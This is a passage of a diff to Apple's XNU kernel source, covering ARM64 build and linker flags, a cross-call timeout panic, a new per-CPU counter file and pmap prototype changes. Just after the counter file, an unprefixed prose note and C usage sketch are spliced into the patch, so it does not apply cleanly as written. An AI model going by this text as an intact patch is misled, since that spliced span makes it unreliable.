 COMPONENT_IMPORT_LIST = $(filter-out $(COMPONENT),$(COMPONENT_LIST))
 
-MACHINE_FLAGS_ARM64_T7000 = -DARM64_BOARD_CONFIG_T7000
-MACHINE_FLAGS_ARM64_T7001 = -DARM64_BOARD_CONFIG_T7001
-MACHINE_FLAGS_ARM64_S8000 = -DARM64_BOARD_CONFIG_S8000
-MACHINE_FLAGS_ARM64_S8001 = -DARM64_BOARD_CONFIG_S8001
+MACHINE_FLAGS_ARM64_T7000 = -DARM64_BOARD_CONFIG_T7000 -mcpu=apple-h7
+MACHINE_FLAGS_ARM64_T7001 = -DARM64_BOARD_CONFIG_T7001 -mcpu=apple-h7
+MACHINE_FLAGS_ARM64_S8000 = -DARM64_BOARD_CONFIG_S8000 -mcpu=apple-h8
+MACHINE_FLAGS_ARM64_S8001 = -DARM64_BOARD_CONFIG_S8001 -mcpu=apple-h8
 MACHINE_FLAGS_ARM_T8002 = -DARM_BOARD_CONFIG_T8002
 MACHINE_FLAGS_ARM_T8004 = -DARM_BOARD_CONFIG_T8004
 MACHINE_FLAGS_ARM64_T8010 = -DARM64_BOARD_CONFIG_T8010 -mcpu=hurricane
 MACHINE_FLAGS_ARM64_T8011 = -DARM64_BOARD_CONFIG_T8011 -mcpu=hurricane
 MACHINE_FLAGS_ARM64_BCM2837 = -DARM64_BOARD_CONFIG_BCM2837
 MACHINE_FLAGS_ARM64_T8020 = -DARM64_BOARD_CONFIG_T8020 -mcpu=vortex
-MACHINE_FLAGS_ARM64_T8101 = -DARM64_BOARD_CONFIG_T8101 -D__ARM_ARCH_8_5__=1
-MACHINE_FLAGS_ARM64_T8103 = -DARM64_BOARD_CONFIG_T8103 -D__ARM_ARCH_8_5__=1
+MACHINE_FLAGS_ARM64_T8101 = -DARM64_BOARD_CONFIG_T8101 -mcpu=apple-a14
+MACHINE_FLAGS_ARM64_T8103 = -DARM64_BOARD_CONFIG_T8103 -mcpu=apple-a14
 
 
 #
@@ -575,6 +575,10 @@ LDFLAGS_KERNEL_RELEASEX86_64 = \
        -Wl,-sectalign,__HIB,__cstring,0x1000 \
        -Wl,-rename_section,__DATA,__const,__DATA_CONST,__const \
        -Wl,-segprot,__DATA_CONST,r--,r-- \
+       -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \
+       -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \
+       -Wl,-segprot,__KLDDATA,rw-,rw- \
+       -Wl,-segprot,__KLD,r-x,r-x \
        -Wl,-no_zero_fill_sections \
        $(LDFLAGS_NOSTRIP_FLAG)
 
@@ -616,7 +620,11 @@ LDFLAGS_KERNEL_GENARM = \
        -Wl,-static \
        -Wl,-image_base,0x80001000 \
        -Wl,-sectalign,__DATA,__const,0x1000 \
-       -Wl,-u,___udivmoddi4
+       -Wl,-u,___udivmoddi4 \
+       -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \
+       -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \
+       -Wl,-segprot,__KLDDATA,rw-,rw- \
+       -Wl,-segprot,__KLD,r-x,r-x
 
 LDFLAGS_KERNEL_RELEASEARM     = \
        $(LDFLAGS_KERNEL_GENARM) \
@@ -685,6 +693,10 @@ LDFLAGS_KERNEL_GENARM64 = \
        -Wl,-rename_section,__DATA,__auth_got,__DATA_CONST,__auth_got \
        -Wl,-rename_section,__DATA,__const,__DATA_CONST,__const \
        -Wl,-segprot,__DATA_CONST,r--,r-- \
+       -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \
+       -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \
+       -Wl,-segprot,__KLDDATA,rw-,rw- \
+       -Wl,-segprot,__KLD,r-x,r-x \
        -Wl,-rename_section,__TEXT,__text,__TEXT_EXEC,__text \
        -Wl,-rename_section,__TEXT,__stubs,__TEXT_EXEC,__stubs \
        -Wl,-sectcreate,"__PLK_TEXT_EXEC",__text,/dev/null \
@@ -695,8 +707,8 @@ LDFLAGS_KERNEL_GENARM64 = \
 
 LDFLAGS_KERNEL_SEGARM64 = \
        -Wl,-rename_section,__PPLDATA,__const,__PPLDATA_CONST,__const \
-       -Wl,-segment_order,__TEXT:__DATA_CONST:__LINKEDIT:__TEXT_EXEC:__PPLTEXT:__PPLTRAMP:__PPLDATA_CONST:__LASTDATA_CONST:__LAST:__PPLDATA:__KLD:__DATA:__HIBDATA:__BOOTDATA \
-       -Wl,-segprot,__PPLTEXT,r-x,r-x  -Wl,-segprot,__PPLTRAMP,r-x,r-x -Wl,-segprot,__PPLDATA_CONST,r--,r-- -Wl,-segprot,__LASTDATA_CONST,r--,r-- -Wl,-segprot,__LAST,r-x,r-x
+       -Wl,-segment_order,__TEXT:__DATA_CONST:__LINKEDIT:__TEXT_EXEC:__KLD:__PPLTEXT:__PPLTRAMP:__PPLDATA_CONST:__LASTDATA_CONST:__LAST:__PPLDATA:__KLDDATA:__DATA:__HIBDATA:__BOOTDATA \
+       -Wl,-segprot,__PPLTEXT,r-x,r-x  -Wl,-segprot,__PPLTRAMP,r-x,r-x -Wl,-segprot,__PPLDATA_CONST,r--,r-- -Wl,-segprot,__LASTDATA_CONST,r--,r-- -Wl,-segprot,__LAST,r-x,r-x \
 
 LDFLAGS_KERNEL_RELEASEARM64     = \
        $(LDFLAGS_KERNEL_GENARM64) \
index ae727ba022f986ffebb5c1dc460776201c06124f..59300b656456f5f3a016c6c63c48f6a6e45ddd60 100644 (file)
@@ -49,6 +49,7 @@
 #include <IOKit/IOCFUnserialize.h>
 #endif
 
+#if CONFIG_USER_NOTIFICATION
 /*
  * DEFINES AND STRUCTURES
  */
@@ -409,6 +410,7 @@ convert_port_to_UNDReply(
        }
        return UND_REPLY_NULL;
 }
+#endif
 
 /*
  *      User interface for setting the host UserNotification Daemon port.
@@ -419,7 +421,12 @@ host_set_UNDServer(
        host_priv_t     host_priv,
        UNDServerRef    server)
 {
+#if CONFIG_USER_NOTIFICATION
        return host_set_user_notification_port(host_priv, server);
+#else
+#pragma unused(host_priv, server)
+       return KERN_NOT_SUPPORTED;
+#endif
 }
 
 /*
@@ -431,5 +438,10 @@ host_get_UNDServer(
        host_priv_t     host_priv,
        UNDServerRef    *serverp)
 {
+#if CONFIG_USER_NOTIFICATION
        return host_get_user_notification_port(host_priv, serverp);
+#else
+#pragma unused(host_priv, serverp)
+       return KERN_NOT_SUPPORTED;
+#endif
 }
index 44610bf50a674505a70ff3df0db1ad281c2b5496..8fadbf4e74dede629a19723a4bdd0e78ab80ca80 100644 (file)
@@ -124,6 +124,14 @@ uint64_t interrupt_masked_timeout = 0xd0000;
 uint64_t stackshot_interrupt_masked_timeout = 0xf9999;
 #endif
 
+/*
+ * A 6-second timeout will give the watchdog code a chance to run
+ * before a panic is triggered by the xcall routine.
+ */
+#define XCALL_ACK_TIMEOUT_NS ((uint64_t) 6000000000)
+uint64_t xcall_ack_timeout_abstime;
+
+
 boot_args const_boot_args __attribute__((section("__DATA, __const")));
 boot_args      *BootArgs __attribute__((section("__DATA, __const")));
 
@@ -146,6 +154,8 @@ SECURITY_READ_ONLY_LATE(boolean_t) diversify_user_jop = TRUE;
 SECURITY_READ_ONLY_LATE(uint64_t) gDramBase;
 SECURITY_READ_ONLY_LATE(uint64_t) gDramSize;
 
+SECURITY_READ_ONLY_LATE(bool) serial_console_enabled = false;
+
 /*
  * Forward definition
  */
@@ -435,7 +445,11 @@ arm_init(
        }
 
        PE_parse_boot_argn("interrupt_masked_debug_timeout", &interrupt_masked_timeout, sizeof(interrupt_masked_timeout));
-#endif
+
+#endif /* INTERRUPT_MASKED_DEBUG */
+
+       nanoseconds_to_absolutetime(XCALL_ACK_TIMEOUT_NS, &xcall_ack_timeout_abstime);
+
 
 #if HAS_BP_RET
        PE_parse_boot_argn("bpret", &bp_ret, sizeof(bp_ret));
@@ -496,6 +510,7 @@ arm_init(
        }
 
        if (serialmode & SERIALMODE_OUTPUT) {                 /* Start serial if requested */
+               serial_console_enabled = true;
                (void)switch_to_serial_console(); /* Switch into serial mode */
                disableConsoleOutput = FALSE;     /* Allow printfs to happen */
        }
index 35f66e5eeebbcd355e38309d83ca691b083fae9c..faf5013e27b1b454ac00b21237cfaa9ef0f80c09 100644 (file)
@@ -111,6 +111,8 @@ vm_offset_t            segLINKB;
 static unsigned long   segSizeLINK;
 static vm_offset_t     segKLDB;
 static unsigned long   segSizeKLD;
+static vm_offset_t     segKLDDATAB;
+static unsigned long   segSizeKLDDATA;
 static vm_offset_t     segLASTB;
 static vm_offset_t     segLASTDATACONSTB;
 static unsigned long   segSizeLASTDATACONST;
@@ -330,6 +332,7 @@ arm_vm_prot_init(boot_args * args)
        arm_vm_page_granular_RNX((vm_offset_t)&fiqstack_high_guard, PAGE_MAX_SIZE, TRUE);
 
        arm_vm_page_granular_ROX(segKLDB, segSizeKLD, force_coarse_physmap);
+       arm_vm_page_granular_RNX(segKLDDATAB, segSizeKLDDATA, force_coarse_physmap);
        arm_vm_page_granular_RWNX(segLINKB, segSizeLINK, force_coarse_physmap);
        arm_vm_page_granular_RWNX(segLASTB, segSizeLAST, FALSE); // __LAST may be empty, but we cannot assume this
        if (segLASTDATACONSTB) {
@@ -481,6 +484,7 @@ arm_vm_init(uint64_t memory_size, boot_args * args)
        segDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__DATA", &segSizeDATA);
        segLINKB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LINKEDIT", &segSizeLINK);
        segKLDB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLD", &segSizeKLD);
+       segKLDDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLDDATA", &segSizeKLDDATA);
        segLASTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LAST", &segSizeLAST);
        segLASTDATACONSTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LASTDATA_CONST", &segSizeLASTDATACONST);
        segPRELINKTEXTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_TEXT", &segSizePRELINKTEXT);
index ef4fe3d84b2f2554329a1c93e68852a9b2eef295..084d863a9e9e503f9f3c83f9567674d0f0ffca84 100644 (file)
@@ -34,7 +34,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <arm/cpu_data_internal.h>
 #include <kern/mach_param.h>
diff --git a/osfmk/arm/counter.c b/osfmk/arm/counter.c
new file mode 100644 (file)
index 0000000..552e538
--- /dev/null
@@ -0,0 +1,81 @@
+/* * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <kern/assert.h>
+#include <kern/cpu_data.h>
+#include <kern/counter.h>
+#include <kern/zalloc.h>
+#include <machine/atomic.h>
+#include <machine/machine_routines.h>
+#include <machine/cpu_number.h>
+
+OS_OVERLOADABLE
+void
+counter_add(scalable_counter_t *counter, uint64_t amount)
+{
+       os_atomic_add(zpercpu_get(*counter), amount, relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_inc(scalable_counter_t *counter)
+{
+       os_atomic_inc(zpercpu_get(*counter), relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_dec(scalable_counter_t *counter)
+{
+       os_atomic_dec(zpercpu_get(*counter), relaxed);
+}
+
+/*
+ * NB: On arm, the preemption disabled implementation is the same as
+ * the normal implementation. Otherwise we would need to enforce that
+ * callers never mix the interfaces for the same counter.
+ */
+OS_OVERLOADABLE
+void
+counter_add_preemption_disabled(scalable_counter_t *counter, uint64_t amount)
+{
+       counter_add(counter, amount);
+}
+
+OS_OVERLOADABLE
+void
+counter_inc_preemption_disabled(scalable_counter_t *counter)
+{
+       counter_inc(counter);
+}
+
+OS_OVERLOADABLE
+void
+counter_dec_preemption_disabled(scalable_counter_t *counter)
+{
+       counter_dec(counter);
+}
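A sketch of how a subsystem would bump these per-CPU counters on a hot path
(the counter name is hypothetical, and its allocation and initialization are
out of scope here):

#include <kern/counter.h>

static scalable_counter_t dropped_packets;  /* assumed allocated elsewhere */

static void
note_drops(uint64_t n)
{
	if (n == 1) {
		counter_inc(&dropped_packets);
	} else {
		counter_add(&dropped_packets, n);
	}
}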
index 738e94f02e9af9150c1ba49a99ee6f4a82dec988..dc5d2d20e485c3318ea8b612a4063688358b9193 100644 (file)
@@ -158,6 +158,10 @@ _Static_assert((_COMM_PAGE64_BASE_ADDRESS >= _COMM_PAGE64_NESTING_START) &&
     "region probably needs to be updated.");
 
 #else /* KERNEL_PRIVATE */
+/*
+ * <sys/commpage.h> defines a couple of convenience macros
+ * to help read data from the commpage.
+ */
 #define _COMM_PAGE_AREA_LENGTH                  (4096)
 
 #define _COMM_PAGE_BASE_ADDRESS                 _COMM_PAGE64_BASE_ADDRESS
index 11ad96d9e0f6948f04012a8fc54b82ed4c28cc2d..faa3b1e80be0e8e6d2146ed4f9cb4c3a18a1e907 100644 (file)
@@ -62,13 +62,15 @@ vm_address_t     percpu_base_cur;
 cpu_data_t       PERCPU_DATA(cpu_data);
 cpu_data_entry_t CpuDataEntries[MAX_CPUS];
 
-static lck_grp_t cpu_lck_grp;
-static lck_rw_t cpu_state_lock;
+static LCK_GRP_DECLARE(cpu_lck_grp, "cpu_lck_grp");
+static LCK_RW_DECLARE(cpu_state_lock, &cpu_lck_grp);
 
 unsigned int    real_ncpus = 1;
 boolean_t       idle_enable = FALSE;
 uint64_t        wake_abstime = 0x0ULL;
 
+extern uint64_t xcall_ack_timeout_abstime;
+
 #if defined(HAS_IPI)
 extern unsigned int gFastIPI;
 #endif /* defined(HAS_IPI) */
@@ -427,6 +429,11 @@ cpu_signal_internal(cpu_data_t *target_proc,
        }
 
        if ((signal == SIGPxcall) || (signal == SIGPxcallImm)) {
+               uint64_t start_mabs_time, max_mabs_time, current_mabs_time;
+               current_mabs_time = start_mabs_time = mach_absolute_time();
+               max_mabs_time = xcall_ack_timeout_abstime + current_mabs_time;
+               assert(max_mabs_time > current_mabs_time);
+
                do {
                        current_signals = target_proc->cpu_signal;
                        if ((current_signals & SIGPdisabled) == SIGPdisabled) {
@@ -447,7 +454,20 @@ cpu_signal_internal(cpu_data_t *target_proc,
                        if (!swap_success && (current_proc->cpu_signal & signal)) {
                                cpu_handle_xcall(current_proc);
                        }
-               } while (!swap_success);
+               } while (!swap_success && ((current_mabs_time = mach_absolute_time()) < max_mabs_time));
+
+               /*
+                * If we time out while waiting for the target CPU to respond, it's possible that no
+                * other CPU is available to handle the watchdog interrupt that would eventually trigger
+                * a panic. To prevent this from happening, we just panic here to flag this condition.
+                */
+               if (__improbable(current_mabs_time >= max_mabs_time)) {
+                       uint64_t end_time_ns, xcall_ack_timeout_ns;
+                       absolutetime_to_nanoseconds(current_mabs_time - start_mabs_time, &end_time_ns);
+                       absolutetime_to_nanoseconds(xcall_ack_timeout_abstime, &xcall_ack_timeout_ns);
+                       panic("CPU%u has failed to respond to cross-call after %llu nanoseconds (timeout = %llu ns)",
+                           target_proc->cpu_number, end_time_ns, xcall_ack_timeout_ns);
+               }
 
                if (signal == SIGPxcallImm) {
                        target_proc->cpu_imm_xcall_p0 = p0;
@@ -825,13 +845,6 @@ ml_cpu_can_exit(__unused int cpu_id)
        return false;
 }
 
-void
-ml_cpu_init_state(void)
-{
-       lck_grp_init(&cpu_lck_grp, "cpu_lck_grp", LCK_GRP_ATTR_NULL);
-       lck_rw_init(&cpu_state_lock, &cpu_lck_grp, LCK_ATTR_NULL);
-}
-
 #ifdef USE_APPLEARMSMP
 
 void
index d9343a0e3c8903d4f7d82432aa2ef58dff74d8db..a0648dc3d50106832d8cae58a1179604bdefbd83 100644 (file)
@@ -72,7 +72,7 @@ static_assert(sizeof(cpumap_t) * CHAR_BIT >= MAX_CPUS, "cpumap_t bitvector is to
 #define CPUWINDOWS_BASE                 (VM_MAX_KERNEL_ADDRESS & CPUWINDOWS_BASE_MASK)
 #define CPUWINDOWS_TOP                  (CPUWINDOWS_BASE + (MAX_CPUS * CPUWINDOWS_MAX * ARM_PGBYTES))
 
-static_assert((CPUWINDOWS_BASE >= VM_MIN_KERNEL_ADDRESS) && (CPUWINDOWS_TOP <= VM_MAX_KERNEL_ADDRESS),
+static_assert((CPUWINDOWS_BASE >= VM_MIN_KERNEL_ADDRESS) && ((CPUWINDOWS_TOP - 1) <= VM_MAX_KERNEL_ADDRESS),
     "CPU copy windows too large for CPUWINDOWS_BASE_MASK value");
 
 typedef struct cpu_data_entry {
index 98fd21b3a85da1e47b959e0c5239e0fb5af9b8dc..8246489dc7d529e63b5fe2f9ae39fd0aee5dd8ce 100644 (file)
@@ -512,7 +512,7 @@ lck_spin_init(
 /*
  * arm_usimple_lock is a lck_spin_t without a group or attributes
  */
-void inline
+MARK_AS_HIBERNATE_TEXT void inline
 arm_usimple_lock_init(simple_lock_t lck, __unused unsigned short initial_value)
 {
        lck->type = LCK_SPIN_TYPE;
index 145a783d380616386d0f834afc7e6dad39d09146..072ed38c2dc542910c86be635dd26537434a8280 100644 (file)
@@ -166,6 +166,17 @@ ml_init_lock_timeout(void)
        high_MutexSpin = low_MutexSpin;
 }
 
+/*
+ * This is called when all of the ml_processor_info_t structures have been
+ * initialized and all the processors have been started through processor_start().
+ *
+ * Required by the scheduler subsystem.
+ */
+void
+ml_cpu_init_completed(void)
+{
+}
+
 /*
  * This is called from the machine-independent routine cpu_up()
  * to perform machine-dependent info updates.
index 22cb5a66fab8a622fe78194c458264d76b6ee2fe..ce2d3cb27a089e6721c4182e9f0894e68a3c2920 100644 (file)
@@ -301,9 +301,6 @@ cluster_type_t ml_get_boot_cluster(void);
  * @field coresight_regs    IO-mapped virtual address of CoreSight debug register block.
  * @field coresight_pa      Physical address of CoreSight register block.
  * @field coresight_len     Length of CoreSight register block.
- * @field self_ipi_irq      AIC IRQ vector for self IPI (cpuX->cpuX).  0 if unsupported.
- * @field other_ipi_irq     AIC IRQ vector for other IPI (cpuX->cpuY).  0 if unsupported.
- * @field pmi_irq           AIC IRQ vector for performance management IRQ.  0 if unsupported.
  * @field die_cluster_id    Cluster ID within the local die (EDT: die-cluster-id)
  * @field cluster_core_id   Core ID within the local cluster (EDT: cluster-core-id)
  */
@@ -327,9 +324,6 @@ typedef struct ml_topology_cpu {
        vm_offset_t                     coresight_regs;
        uint64_t                        coresight_pa;
        uint64_t                        coresight_len;
-       int                             self_ipi_irq;
-       int                             other_ipi_irq;
-       int                             pmi_irq;
        unsigned int                    die_cluster_id;
        unsigned int                    cluster_core_id;
 } ml_topology_cpu_t;
@@ -683,6 +677,11 @@ uint64_t ml_get_timebase_entropy(void);
 
 void ml_init_lock_timeout(void);
 
+#if __arm64__
+uint64_t virtual_timeout_inflate_ns(unsigned int vti, uint64_t timeout);
+uint64_t virtual_timeout_inflate_abs(unsigned int vti, uint64_t timeout);
+#endif
+
 boolean_t ml_delay_should_spin(uint64_t interval);
 
 void ml_delay_on_yield(void);
@@ -775,6 +774,7 @@ vm_map_offset_t ml_get_max_offset(
 #define MACHINE_MAX_OFFSET_DEVICE       0x08
 #endif
 
+extern void     ml_cpu_init_completed(void);
 extern void     ml_cpu_up(void);
 extern void     ml_cpu_down(void);
 extern void     ml_arm_sleep(void);
index 0c5617c3044c526b4ee2d62a7f2a6f49e4a0212f..18031f83b309a9b020295188872a61827dbe9ee4 100644 (file)
@@ -56,12 +56,20 @@ configure_misc_apple_regs(void)
 #endif /* __arm64__ */
 
 #if HAS_APPLE_PAC
+
+
+/**
+ * Returns the default ROP key.
+ */
 uint64_t
 ml_default_rop_pid(void)
 {
        return 0;
 }
 
+/**
+ * Returns the default JOP key.
+ */
 uint64_t
 ml_default_jop_pid(void)
 {
index f7fca614b8aa2addf323d6749841f4f24bda664e..aa60dd3fe3a480182d006a2663f1b66a862d39a7 100644 (file)
@@ -526,6 +526,7 @@ machine_thread_group_init(struct thread_group *tg)
        data.thread_group_id = thread_group_get_id(tg);
        data.thread_group_data = thread_group_get_machine_data(tg);
        data.thread_group_size = thread_group_machine_data_size();
+       data.thread_group_flags = thread_group_get_flags(tg);
        sched_perfcontrol_thread_group_init(&data);
 }
 
@@ -539,6 +540,7 @@ machine_thread_group_deinit(struct thread_group *tg)
        data.thread_group_id = thread_group_get_id(tg);
        data.thread_group_data = thread_group_get_machine_data(tg);
        data.thread_group_size = thread_group_machine_data_size();
+       data.thread_group_flags = thread_group_get_flags(tg);
        sched_perfcontrol_thread_group_deinit(&data);
 }
 
index b7cead5fa54c4b5743a83bf7af051de6498e09a8..053fe3a94633506f9ba1cd8782833e069cc86fc7 100644 (file)
@@ -1148,6 +1148,10 @@ DebuggerXCall(
                INTERRUPT_MASKED_DEBUG_START(current_thread()->machine.int_handler_addr, current_thread()->machine.int_type);
        }
 
+#if defined(__arm64__)
+       current_thread()->machine.kpcb = NULL;
+#endif /* defined(__arm64__) */
+
        /* Any cleanup for our pushed context should go here */
 }
 
index 4719ce5b87adca2b2589eeef570a55e6e1e6371f..60eb475d270f978b09278f84bcd62312e19d2221 100644 (file)
@@ -130,7 +130,6 @@ extern u_int32_t random(void); /* from <libkern/libkern.h> */
 static bool alloc_asid(pmap_t pmap);
 static void free_asid(pmap_t pmap);
 static void flush_mmu_tlb_region_asid_async(vm_offset_t va, size_t length, pmap_t pmap);
-static void flush_mmu_tlb_tte_asid_async(vm_offset_t va, pmap_t pmap);
 static void flush_mmu_tlb_full_asid_async(pmap_t pmap);
 static pt_entry_t wimg_to_pte(unsigned int wimg);
 
@@ -138,7 +137,6 @@ struct page_table_ops {
        bool (*alloc_id)(pmap_t pmap);
        void (*free_id)(pmap_t pmap);
        void (*flush_tlb_region_async)(vm_offset_t va, size_t length, pmap_t pmap);
-       void (*flush_tlb_tte_async)(vm_offset_t va, pmap_t pmap);
        void (*flush_tlb_async)(pmap_t pmap);
        pt_entry_t (*wimg_to_pte)(unsigned int wimg);
 };
@@ -148,7 +146,6 @@ static const struct page_table_ops native_pt_ops =
        .alloc_id = alloc_asid,
        .free_id = free_asid,
        .flush_tlb_region_async = flush_mmu_tlb_region_asid_async,
-       .flush_tlb_tte_async = flush_mmu_tlb_tte_asid_async,
        .flush_tlb_async = flush_mmu_tlb_full_asid_async,
        .wimg_to_pte = wimg_to_pte,
 };
@@ -599,6 +596,12 @@ pt_attr_leaf_xn(__unused const pt_attr_t * const pt_attr)
        return ARM_PTE_NX;
 }
 
+static inline uintptr_t
+pt_attr_leaf_x(__unused const pt_attr_t * const pt_attr)
+{
+       return ARM_PTE_PNX;
+}
+
 __unused static inline uintptr_t
 pt_attr_ln_offmask(__unused const pt_attr_t * const pt_attr, unsigned int level)
 {
@@ -861,7 +864,7 @@ struct pmap                     kernel_pmap_store MARK_AS_PMAP_DATA;
 SECURITY_READ_ONLY_LATE(pmap_t) kernel_pmap = &kernel_pmap_store;
 
 struct vm_object pmap_object_store VM_PAGE_PACKED_ALIGNED;       /* store pt pages */
-vm_object_t     pmap_object = &pmap_object_store;
+SECURITY_READ_ONLY_LATE(vm_object_t) pmap_object = &pmap_object_store;
 
 static SECURITY_READ_ONLY_LATE(zone_t) pmap_zone;  /* zone of pmap structures */
 
@@ -1791,6 +1794,7 @@ pmap_ledger_validate(void * ledger)
  * Trace levels are controlled by a bitmask in which each
  * level can be enabled/disabled by the (1<<level) position
  * in the boot arg
+ * Level 0: PPL extension functionality
  * Level 1: pmap lifecycle (create/destroy/switch)
  * Level 2: mapping lifecycle (enter/remove/protect/nest/unnest)
  * Level 3: internal state management (attributes/fast-fault)
@@ -1850,10 +1854,10 @@ static kern_return_t pmap_expand(
        pmap_t, vm_map_address_t, unsigned int options, unsigned int level);
 
 static int pmap_remove_range(
-       pmap_t, vm_map_address_t, pt_entry_t *, pt_entry_t *, uint32_t *);
+       pmap_t, vm_map_address_t, pt_entry_t *, pt_entry_t *);
 
 static int pmap_remove_range_options(
-       pmap_t, vm_map_address_t, pt_entry_t *, pt_entry_t *, uint32_t *, bool *, int);
+       pmap_t, vm_map_address_t, pt_entry_t *, pt_entry_t *, vm_map_address_t *, bool *, int);
 
 static tt_entry_t *pmap_tt1_allocate(
        pmap_t, vm_size_t, unsigned int);
@@ -1871,7 +1875,7 @@ static kern_return_t pmap_tt_allocate(
 #define PMAP_TT_ALLOCATE_NOWAIT         0x1
 
 static void pmap_tte_deallocate(
-       pmap_t, tt_entry_t *, unsigned int);
+       pmap_t, vm_offset_t, vm_offset_t, bool, tt_entry_t *, unsigned int);
 
 const unsigned int arm_hardware_page_size = ARM_PGBYTES;
 const unsigned int arm_pt_desc_size = sizeof(pt_desc_t);
@@ -2100,10 +2104,11 @@ PMAP_SUPPORT_PROTOTYPES(
        void,
        pmap_page_protect_options, (ppnum_t ppnum,
        vm_prot_t prot,
-       unsigned int options), PMAP_PAGE_PROTECT_OPTIONS_INDEX);
+       unsigned int options,
+       void *arg), PMAP_PAGE_PROTECT_OPTIONS_INDEX);
 
 PMAP_SUPPORT_PROTOTYPES(
-       void,
+       vm_map_address_t,
        pmap_protect_options, (pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
@@ -2129,7 +2134,7 @@ PMAP_SUPPORT_PROTOTYPES(
        pmap_reference, (pmap_t pmap), PMAP_REFERENCE_INDEX);
 
 PMAP_SUPPORT_PROTOTYPES(
-       int,
+       vm_map_address_t,
        pmap_remove_options, (pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
@@ -2199,7 +2204,7 @@ PMAP_SUPPORT_PROTOTYPES(
 
 #if __ARM_RANGE_TLBI__
 PMAP_SUPPORT_PROTOTYPES(
-       void,
+       vm_map_address_t,
        phys_attribute_clear_range, (pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
@@ -2271,6 +2276,15 @@ PMAP_SUPPORT_PROTOTYPES(
        bool,
        pmap_lookup_in_loaded_trust_caches, (const uint8_t cdhash[CS_CDHASH_LEN]), PMAP_LOOKUP_IN_LOADED_TRUST_CACHES_INDEX);
 
+PMAP_SUPPORT_PROTOTYPES(
+       void,
+       pmap_set_compilation_service_cdhash, (const uint8_t cdhash[CS_CDHASH_LEN]),
+       PMAP_SET_COMPILATION_SERVICE_CDHASH_INDEX);
+
+PMAP_SUPPORT_PROTOTYPES(
+       bool,
+       pmap_match_compilation_service_cdhash, (const uint8_t cdhash[CS_CDHASH_LEN]),
+       PMAP_MATCH_COMPILATION_SERVICE_CDHASH_INDEX);
 
 #if XNU_MONITOR
 static void pmap_mark_page_as_ppl_page(pmap_paddr_t pa);
@@ -2335,6 +2349,13 @@ static void pmap_pgtrace_remove_clone(pmap_t pmap, pmap_paddr_t pa_page, vm_map_
 static void pmap_pgtrace_remove_all_clone(pmap_paddr_t pa);
 #endif
 
+#if DEVELOPMENT || DEBUG
+PMAP_SUPPORT_PROTOTYPES(
+       kern_return_t,
+       pmap_test_text_corruption, (pmap_paddr_t),
+       PMAP_TEST_TEXT_CORRUPTION_INDEX);
+#endif /* DEVELOPMENT || DEBUG */
+
 #if     (__ARM_VMSA__ > 7)
 /*
  * The low global vector page is mapped at a fixed alias.
@@ -2410,20 +2431,26 @@ const void * __ptrauth_ppl_handler const ppl_handler_table[PMAP_COUNT] = {
        [PMAP_IS_TRUST_CACHE_LOADED_INDEX] = pmap_is_trust_cache_loaded_internal,
        [PMAP_LOOKUP_IN_STATIC_TRUST_CACHE_INDEX] = pmap_lookup_in_static_trust_cache_internal,
        [PMAP_LOOKUP_IN_LOADED_TRUST_CACHES_INDEX] = pmap_lookup_in_loaded_trust_caches_internal,
+       [PMAP_SET_COMPILATION_SERVICE_CDHASH_INDEX] = pmap_set_compilation_service_cdhash_internal,
+       [PMAP_MATCH_COMPILATION_SERVICE_CDHASH_INDEX] = pmap_match_compilation_service_cdhash_internal,
        [PMAP_TRIM_INDEX] = pmap_trim_internal,
        [PMAP_LEDGER_ALLOC_INIT_INDEX] = pmap_ledger_alloc_init_internal,
        [PMAP_LEDGER_ALLOC_INDEX] = pmap_ledger_alloc_internal,
        [PMAP_LEDGER_FREE_INDEX] = pmap_ledger_free_internal,
-#if HAS_APPLE_PAC && XNU_MONITOR
+#if HAS_APPLE_PAC
        [PMAP_SIGN_USER_PTR] = pmap_sign_user_ptr_internal,
        [PMAP_AUTH_USER_PTR] = pmap_auth_user_ptr_internal,
-#endif /* HAS_APPLE_PAC && XNU_MONITOR */
+#endif /* HAS_APPLE_PAC */
 #if __ARM_RANGE_TLBI__
        [PHYS_ATTRIBUTE_CLEAR_RANGE_INDEX] = phys_attribute_clear_range_internal,
 #endif /* __ARM_RANGE_TLBI__ */
